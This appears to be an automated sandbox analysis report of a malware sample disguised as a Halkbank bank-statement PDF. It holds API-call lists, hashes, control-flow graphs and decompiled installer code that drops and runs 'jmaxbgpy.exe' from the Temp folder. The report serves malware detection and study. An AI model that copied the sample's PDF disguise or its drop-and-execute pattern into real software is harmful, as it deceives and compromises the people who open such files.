                                                                    • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                    • GetDlgItem.USER32 ref: 0040425E
                                                                    • GetDlgItem.USER32 ref: 00404268
                                                                    • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                    • GetDlgItem.USER32 ref: 00404379
                                                                    • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                    • EnableWindow.USER32(?,?), ref: 004043AC
                                                                    • EnableWindow.USER32(?,?), ref: 004043C7
                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                    • EnableMenuItem.USER32 ref: 004043E4
                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                    • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                    • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                    • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                    • String ID: H7B
                                                                    • API String ID: 2475350683-2300413410
                                                                    • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                    • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                    • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                    • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                    C-Code - Quality: 96%
                                                                    			E00403D17(void* __eflags) {
                                                                    				intOrPtr _v4;
                                                                    				intOrPtr _v8;
                                                                    				int _v12;
                                                                    				void _v16;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr* _t22;
                                                                    				void* _t30;
                                                                    				void* _t32;
                                                                    				int _t33;
                                                                    				void* _t36;
                                                                    				int _t39;
                                                                    				int _t40;
                                                                    				int _t44;
                                                                    				short _t63;
                                                                    				WCHAR* _t65;
                                                                    				signed char _t69;
                                                                    				WCHAR* _t76;
                                                                    				intOrPtr _t82;
                                                                    				WCHAR* _t87;
                                                                    
                                                                    				_t82 =  *0x42a270;
                                                                    				_t22 = E00406A35(2);
                                                                    				_t90 = _t22;
                                                                    				if(_t22 == 0) {
                                                                    					_t76 = 0x423748;
                                                                    					L"1033" = 0x30;
                                                                    					 *0x437002 = 0x78;
                                                                    					 *0x437004 = 0;
                                                                    					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                                    					__eflags =  *0x423748;
                                                                    					if(__eflags == 0) {
                                                                    						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                                    					}
                                                                    					lstrcatW(L"1033", _t76);
                                                                    				} else {
                                                                    					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                                    				}
                                                                    				E00403FED(_t78, _t90);
                                                                    				_t86 = L"C:\\Users\\alfons\\AppData\\Local\\Temp";
                                                                    				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                                    				 *0x42a2fc = 0x10000;
                                                                    				if(E0040603F(_t90, L"C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                                                                    					L16:
                                                                    					if(E0040603F(_t98, _t86) == 0) {
                                                                    						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                                                                    					}
                                                                    					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                                    					 *0x429248 = _t30;
                                                                    					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                    						L21:
                                                                    						if(E0040140B(0) == 0) {
                                                                    							_t32 = E00403FED(_t78, __eflags);
                                                                    							__eflags =  *0x42a300;
                                                                    							if( *0x42a300 != 0) {
                                                                    								_t33 = E0040579D(_t32, 0);
                                                                    								__eflags = _t33;
                                                                    								if(_t33 == 0) {
                                                                    									E0040140B(1);
                                                                    									goto L33;
                                                                    								}
                                                                    								__eflags =  *0x42922c;
                                                                    								if( *0x42922c == 0) {
                                                                    									E0040140B(2);
                                                                    								}
                                                                    								goto L22;
                                                                    							}
                                                                    							ShowWindow( *0x423728, 5); // executed
                                                                    							_t39 = E004069C5("RichEd20"); // executed
                                                                    							__eflags = _t39;
                                                                    							if(_t39 == 0) {
                                                                    								E004069C5("RichEd32");
                                                                    							}
                                                                    							_t87 = L"RichEdit20W";
                                                                    							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                                    							__eflags = _t40;
                                                                    							if(_t40 == 0) {
                                                                    								GetClassInfoW(0, L"RichEdit", 0x429200);
                                                                    								 *0x429224 = _t87;
                                                                    								RegisterClassW(0x429200);
                                                                    							}
                                                                    							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
                                                                    							E00403C67(E0040140B(5), 1);
                                                                    							return _t44;
                                                                    						}
                                                                    						L22:
                                                                    						_t36 = 2;
                                                                    						return _t36;
                                                                    					} else {
                                                                    						_t78 =  *0x42a260;
                                                                    						 *0x429204 = E00401000;
                                                                    						 *0x429210 =  *0x42a260;
                                                                    						 *0x429214 = _t30;
                                                                    						 *0x429224 = 0x40a3b4;
                                                                    						if(RegisterClassW(0x429200) == 0) {
                                                                    							L33:
                                                                    							__eflags = 0;
                                                                    							return 0;
                                                                    						}
                                                                    						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                    						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
                                                                    						goto L21;
                                                                    					}
                                                                    				} else {
                                                                    					_t78 =  *(_t82 + 0x48);
                                                                    					_t92 = _t78;
                                                                    					if(_t78 == 0) {
                                                                    						goto L16;
                                                                    					}
                                                                    					_t76 = 0x428200;
                                                                    					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
                                                                    					_t63 =  *0x428200; // 0x22
                                                                    					if(_t63 == 0) {
                                                                    						goto L16;
                                                                    					}
                                                                    					if(_t63 == 0x22) {
                                                                    						_t76 = 0x428202;
                                                                    						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
                                                                    					}
                                                                    					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                    					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                    						L15:
                                                                    						E00406668(_t86, E00405F37(_t76));
                                                                    						goto L16;
                                                                    					} else {
                                                                    						_t69 = GetFileAttributesW(_t76);
                                                                    						if(_t69 == 0xffffffff) {
                                                                    							L14:
                                                                    							E00405F83(_t76);
                                                                    							goto L15;
                                                                    						}
                                                                    						_t98 = _t69 & 0x00000010;
                                                                    						if((_t69 & 0x00000010) != 0) {
                                                                    							goto L15;
                                                                    						}
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    			}
























                                                                    0x00403d1d
                                                                    0x00403d26
                                                                    0x00403d2d
                                                                    0x00403d2f
                                                                    0x00403d43
                                                                    0x00403d55
                                                                    0x00403d5e
                                                                    0x00403d67
                                                                    0x00403d6e
                                                                    0x00403d73
                                                                    0x00403d7a
                                                                    0x00403d8d
                                                                    0x00403d8d
                                                                    0x00403d98
                                                                    0x00403d31
                                                                    0x00403d3c
                                                                    0x00403d3c
                                                                    0x00403d9d
                                                                    0x00403da7
                                                                    0x00403db0
                                                                    0x00403db5
                                                                    0x00403dc6
                                                                    0x00403e58
                                                                    0x00403e60
                                                                    0x00403e69
                                                                    0x00403e69
                                                                    0x00403e7f
                                                                    0x00403e85
                                                                    0x00403e93
                                                                    0x00403f14
                                                                    0x00403f1c
                                                                    0x00403f26
                                                                    0x00403f2b
                                                                    0x00403f31
                                                                    0x00403fbb
                                                                    0x00403fc0
                                                                    0x00403fc2
                                                                    0x00403fde
                                                                    0x00000000
                                                                    0x00403fde
                                                                    0x00403fc4
                                                                    0x00403fca
                                                                    0x00403fd2
                                                                    0x00403fd2
                                                                    0x00000000
                                                                    0x00403fca
                                                                    0x00403f3f
                                                                    0x00403f4a
                                                                    0x00403f4f
                                                                    0x00403f51
                                                                    0x00403f58
                                                                    0x00403f58
                                                                    0x00403f63
                                                                    0x00403f6b
                                                                    0x00403f6d
                                                                    0x00403f6f
                                                                    0x00403f78
                                                                    0x00403f7b
                                                                    0x00403f81
                                                                    0x00403f81
                                                                    0x00403fa0
                                                                    0x00403fb1
                                                                    0x00000000
                                                                    0x00403fb6
                                                                    0x00403f1e
                                                                    0x00403f20
                                                                    0x00000000
                                                                    0x00403e95
                                                                    0x00403e95
                                                                    0x00403ea1
                                                                    0x00403eab
                                                                    0x00403eb1
                                                                    0x00403eb6
                                                                    0x00403ec5
                                                                    0x00403fe3
                                                                    0x00403fe3
                                                                    0x00000000
                                                                    0x00403fe3
                                                                    0x00403ed4
                                                                    0x00403f0f
                                                                    0x00000000
                                                                    0x00403f0f
                                                                    0x00403dcc
                                                                    0x00403dcc
                                                                    0x00403dcf
                                                                    0x00403dd1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403ddf
                                                                    0x00403df1
                                                                    0x00403df6
                                                                    0x00403dff
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e05
                                                                    0x00403e07
                                                                    0x00403e14
                                                                    0x00403e14
                                                                    0x00403e1d
                                                                    0x00403e23
                                                                    0x00403e4b
                                                                    0x00403e53
                                                                    0x00000000
                                                                    0x00403e35
                                                                    0x00403e36
                                                                    0x00403e3f
                                                                    0x00403e45
                                                                    0x00403e46
                                                                    0x00000000
                                                                    0x00403e46
                                                                    0x00403e41
                                                                    0x00403e43
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00403e43
                                                                    0x00403e23

                                                                    APIs
                                                                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,?,?,?,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,766DFAA0), ref: 00403E18
                                                                    • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,?,?,?,"C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                    • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj,?,00000000,?), ref: 00403E36
                                                                    • LoadImageW.USER32 ref: 00403E7F
                                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                    • RegisterClassW.USER32 ref: 00403EBC
                                                                    • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                    • CreateWindowExW.USER32 ref: 00403F09
                                                                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                    • GetClassInfoW.USER32 ref: 00403F6B
                                                                    • GetClassInfoW.USER32 ref: 00403F78
                                                                    • RegisterClassW.USER32 ref: 00403F81
                                                                    • DialogBoxParamW.USER32 ref: 00403FA0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                    • API String ID: 1975747703-1969877980
                                                                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                    C-Code - Quality: 98%
                                                                    			E004030D0(void* __eflags, signed int _a4) {
                                                                    				DWORD* _v8;
                                                                    				DWORD* _v12;
                                                                    				intOrPtr _v16;
                                                                    				long _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v28;
                                                                    				intOrPtr _v32;
                                                                    				intOrPtr _v36;
                                                                    				signed int _v40;
                                                                    				short _v560;
                                                                    				long _t54;
                                                                    				void* _t57;
                                                                    				void* _t62;
                                                                    				intOrPtr _t65;
                                                                    				void* _t68;
                                                                    				intOrPtr* _t70;
                                                                    				long _t82;
                                                                    				signed int _t89;
                                                                    				intOrPtr _t92;
                                                                    				long _t94;
                                                                    				void* _t102;
                                                                    				void* _t106;
                                                                    				long _t107;
                                                                    				long _t110;
                                                                    				void* _t111;
                                                                    
                                                                    				_t94 = 0;
                                                                    				_v8 = 0;
                                                                    				_v12 = 0;
                                                                    				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                    				GetModuleFileNameW(0, L"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x400);
                                                                    				_t106 = E00406158(L"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe", 0x80000000, 3);
                                                                    				 *0x40a018 = _t106;
                                                                    				if(_t106 == 0xffffffff) {
                                                                    					return L"Error launching installer";
                                                                    				}
                                                                    				E00406668(L"C:\\Users\\alfons\\Desktop", L"C:\\Users\\alfons\\Desktop\\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe");
                                                                    				E00406668(0x439000, E00405F83(L"C:\\Users\\alfons\\Desktop"));
                                                                    				_t54 = GetFileSize(_t106, 0);
                                                                    				 *0x420f00 = _t54;
                                                                    				_t110 = _t54;
                                                                    				if(_t54 <= 0) {
                                                                    					L24:
                                                                    					E0040302E(1);
                                                                    					if( *0x42a274 == _t94) {
                                                                    						goto L32;
                                                                    					}
                                                                    					if(_v12 == _t94) {
                                                                    						L28:
                                                                    						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                    						_t111 = _t57;
                                                                    						E00406B90(0x40ce68);
                                                                    						E00406187(0x40ce68,  &_v560, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
                                                                    						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                    						 *0x40a01c = _t62;
                                                                    						if(_t62 != 0xffffffff) {
                                                                    							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                    							 *0x420f04 = _t65;
                                                                    							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                    							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                    							if(_t68 == _v20) {
                                                                    								 *0x42a270 = _t111;
                                                                    								 *0x42a278 =  *_t111;
                                                                    								if((_v40 & 0x00000001) != 0) {
                                                                    									 *0x42a27c =  *0x42a27c + 1;
                                                                    								}
                                                                    								_t45 = _t111 + 0x44; // 0x44
                                                                    								_t70 = _t45;
                                                                    								_t102 = 8;
                                                                    								do {
                                                                    									_t70 = _t70 - 8;
                                                                    									 *_t70 =  *_t70 + _t111;
                                                                    									_t102 = _t102 - 1;
                                                                    								} while (_t102 != 0);
                                                                    								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                                    								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                    								return 0;
                                                                    							}
                                                                    							goto L32;
                                                                    						}
                                                                    						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                    					}
                                                                    					E004035F8( *0x420ef0);
                                                                    					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                                    						goto L32;
                                                                    					} else {
                                                                    						goto L28;
                                                                    					}
                                                                    				} else {
                                                                    					do {
                                                                    						_t107 = _t110;
                                                                    						asm("sbb eax, eax");
                                                                    						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                                    						if(_t110 >= _t82) {
                                                                    							_t107 = _t82;
                                                                    						}
                                                                    						if(E004035E2(0x418ef0, _t107) == 0) {
                                                                    							E0040302E(1);
                                                                    							L32:
                                                                    							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                    						}
                                                                    						if( *0x42a274 != 0) {
                                                                    							if((_a4 & 0x00000002) == 0) {
                                                                    								E0040302E(0);
                                                                    							}
                                                                    							goto L20;
                                                                    						}
                                                                    						E00406113( &_v40, 0x418ef0, 0x1c);
                                                                    						_t89 = _v40;
                                                                    						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                    							_a4 = _a4 | _t89;
                                                                    							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                    							_t92 = _v16;
                                                                    							 *0x42a274 =  *0x420ef0;
                                                                    							if(_t92 > _t110) {
                                                                    								goto L32;
                                                                    							}
                                                                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                    								_v12 = _v12 + 1;
                                                                    								_t110 = _t92 - 4;
                                                                    								if(_t107 > _t110) {
                                                                    									_t107 = _t110;
                                                                    								}
                                                                    								goto L20;
                                                                    							} else {
                                                                    								break;
                                                                    							}
                                                                    						}
                                                                    						L20:
                                                                    						if(_t110 <  *0x420f00) {
                                                                    							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                                    						}
                                                                    						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                    						_t110 = _t110 - _t107;
                                                                    					} while (_t110 != 0);
                                                                    					_t94 = 0;
                                                                    					goto L24;
                                                                    				}
                                                                    			}




























                                                                    0x004030db
                                                                    0x004030de
                                                                    0x004030e1
                                                                    0x004030fb
                                                                    0x00403100
                                                                    0x00403113
                                                                    0x00403118
                                                                    0x0040311e
                                                                    0x00000000
                                                                    0x00403120
                                                                    0x00403131
                                                                    0x00403142
                                                                    0x00403149
                                                                    0x00403151
                                                                    0x00403156
                                                                    0x00403158
                                                                    0x00403243
                                                                    0x00403245
                                                                    0x00403251
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040325a
                                                                    0x00403286
                                                                    0x0040328b
                                                                    0x00403296
                                                                    0x00403298
                                                                    0x004032a9
                                                                    0x004032c4
                                                                    0x004032cd
                                                                    0x004032d2
                                                                    0x004032f1
                                                                    0x00403301
                                                                    0x00403313
                                                                    0x00403318
                                                                    0x00403320
                                                                    0x0040332d
                                                                    0x00403335
                                                                    0x0040333a
                                                                    0x0040333c
                                                                    0x0040333c
                                                                    0x00403344
                                                                    0x00403344
                                                                    0x00403347
                                                                    0x00403348
                                                                    0x00403348
                                                                    0x0040334b
                                                                    0x0040334d
                                                                    0x0040334d
                                                                    0x00403357
                                                                    0x00403363
                                                                    0x00000000
                                                                    0x00403368
                                                                    0x00000000
                                                                    0x00403320
                                                                    0x00000000
                                                                    0x004032d4
                                                                    0x00403262
                                                                    0x00403274
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040315e
                                                                    0x00403163
                                                                    0x00403168
                                                                    0x0040316c
                                                                    0x00403173
                                                                    0x0040317a
                                                                    0x0040317c
                                                                    0x0040317c
                                                                    0x00403187
                                                                    0x004032e0
                                                                    0x00403322
                                                                    0x00000000
                                                                    0x00403322
                                                                    0x00403194
                                                                    0x00403214
                                                                    0x00403218
                                                                    0x0040321d
                                                                    0x00000000
                                                                    0x00403214
                                                                    0x0040319d
                                                                    0x004031a2
                                                                    0x004031aa
                                                                    0x004031d0
                                                                    0x004031df
                                                                    0x004031e5
                                                                    0x004031ea
                                                                    0x004031f0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004031fa
                                                                    0x00403202
                                                                    0x00403205
                                                                    0x0040320a
                                                                    0x0040320c
                                                                    0x0040320c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004031fa
                                                                    0x0040321e
                                                                    0x00403224
                                                                    0x00403230
                                                                    0x00403230
                                                                    0x00403233
                                                                    0x00403239
                                                                    0x00403239
                                                                    0x00403241
                                                                    0x00000000
                                                                    0x00403241

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 004030E4
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,00000400), ref: 00403100
                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 00403149
                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
